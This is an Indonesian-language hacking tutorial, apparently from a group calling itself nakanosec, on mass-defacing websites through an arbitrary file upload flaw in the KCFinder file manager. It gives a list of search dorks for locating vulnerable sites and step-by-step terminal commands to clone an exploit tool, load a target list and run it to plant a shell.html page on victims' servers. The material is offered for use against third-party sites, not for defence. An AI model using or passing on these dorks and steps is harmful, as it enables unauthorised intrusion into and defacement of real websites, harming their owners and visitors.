Cara Deface POC KFCINDER Exploit
KCFINDER adalah sebuah plugin pada cms wordpress yang berfungsi menambahkan fitur file manager dimana nantinya akan mengatur segala jenis proses transfer file pada situs. Beberapa cms lokal juga menerapkan kcfinder pada cms yang mereka gunakan. sayangnya plugin jenis ini memiliki beberapa kerentanan yang mengakibatkan adanya celah arbitary file upload pada website. Pada artikel ini nakanosec akan membahas bagaimana cara exploitasi celah Kcfinder dengan tools mass deface buatan nakanosec.
Bahan
- Termux / Terminal
- Internet
- Browser
- Script pepes html (belom bikin mass exploit yang php hehehehe)
- Camilan (Kopi atau Boba enak juga)
Kumpulan Dork KCFINDER
- inurl:semua-playlist.html intext:semua daftar / koleksi video
- inurl:semua-agenda.html intitle:daftar semua agenda
- inurl:/?scrindo= intext:Web Support System Bisnis Team
- inurl:/admin/kcfinder/
- inurl:/kcfinder/browse.php
- inurl:/kcfinder/upload.php
- inurl:/asset/kcfinder
- sites/all/modules/civicrm/packages/kcfinder
- inurl:templates/_editor/kcfinder/
- inurl:includes/kcfinder/browse.php
- inurl:/kcfinder/browse.php
- inurl:lib/kcfinder/files/upload
- inurl:admin/kcfinder/files/upload
- inurl:panel/kcfinder/upload/files
- inurl:editor/kcfinder/upload
- inurl:Kcfinder/upload/files
- inurl:/panel/kcfinder/ ext:png
Tutorial Deface Menggunakan Terminal atau Termux
1.Buat List web menggunakan dork diatas
2.Save as List.txt
3.Buka terminal dan lakukan installasi git dengan cara
sudo apt-get install git
Untuk user termux
pkg install git
4.Download toolsnya dengan command dibawah
git clone https://github.com/Adelittle/kcexploit
5.Masuk ke Directory tools dengan perintah
cd kcexploit
6.Masukkan list.txt tadi kedalam Directory kcexploit atau bisa membuat file baru dengan perintah
nano list.txt
7.Pastekan list kalian dan tekan ctrl+x lalu ketik Y dan enter
8.Jalankan Tools tersebut dengan command dibawah
bash exploit.sh
9.Masukkan nama list kalian (misal list.txt)
10.Tunggu sambil ngudud
Untuk hasilnya bisa kalian lihat di http://namaweb.com/kcfinder/upload/files/shell.html
Nantinya tools ini akan di update dimana hasil akan tersimpan otomatis pada file result.txt kalo adminya ga mager
untuk merubah nama file silahkan ubah shell.html pada codingan menjadi shell kalian dan letakkan pada directory kcexploit (cek warna merah)
Sekian tutorial deface dari nakanosec kalo ada pertanyaan bisa tanya lewat fanspage dan jangan lupa like fanspage kami dibawah ini :)